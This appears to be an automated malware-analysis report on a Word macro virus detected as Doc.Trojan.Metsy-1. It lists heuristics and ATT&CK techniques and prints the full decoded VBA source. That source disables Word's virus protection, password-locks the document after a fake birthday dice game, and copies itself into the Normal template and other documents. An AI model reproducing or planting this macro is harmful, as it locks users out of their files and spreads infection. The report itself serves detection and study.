MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that executes upon opening the document. This macro displays a fake game to the user, and if the user 'loses', it sets a password on the document and saves it. It also attempts to export a component to 'C:\System.dat' and potentially modify the Normal template, suggesting an attempt at persistence. The ClamAV detection further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Metsy-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Metsy-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2386 bytes |
SHA-256: 2ad6b18cedb70bbfaee2bf3ab5e83475fa0aed49728a42d3faf8d77ab273c1a8 |
|||
|
Detection
ClamAV:
Doc.Trojan.Metys-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If Day(Date) = 7 And Month(Date) = 2 Then
MsgBox "Happy Birthday Jess! To celebrate, we're going to see how lucky you are " & Application.UserName & ". Click the OK button below to roll a number. If your number matches that of the dealer, you win!"
X = Int((9 * Rnd) + 1)
Y = Int((9 * Rnd) + 1)
If X = Y Then
MsgBox "You roll a " & X & " and the dealer rolls a " & Y & ". You win!"
Exit Sub
Else
MsgBox "You roll a " & X & " and the dealer rolls a " & Y & ". I'm sorry, but you lost. Better luck next time!"
For i = 1 To 14
RndNumber = Int((9 * Rnd) + 0)
X = X & RndNumber
Next i
ActiveDocument.Words.First = "YOU LOSE! "
ActiveDocument.Password = X
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ActiveDocument.Close
End If
End If
Exit Sub
End Sub
Private Sub Document_Close()
On Error GoTo Out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
AD = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
NT = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If NT > 55 And AD > 0 Then GoTo Out
If NT < 55 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents(1).Export "C:\System.dat"
host.codemodule.AddFromFile ("C:\System.dat")
With host.codemodule
For X = 1 To 4
.DeleteLines 1
Next X
End With
Kill ("C:\System.dat")
End If
If AD = 0 Then
Set host = ActiveDocument.VBProject.VBComponents.Item(1)
NormalTemplate.VBProject.VBComponents(1).Export "C:\System.dat"
host.codemodule.AddFromFile ("C:\System.dat")
With host.codemodule
For X = 1 To 4
.DeleteLines 1
Next X
End With
Kill ("C:\System.dat")
End If
Out:
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.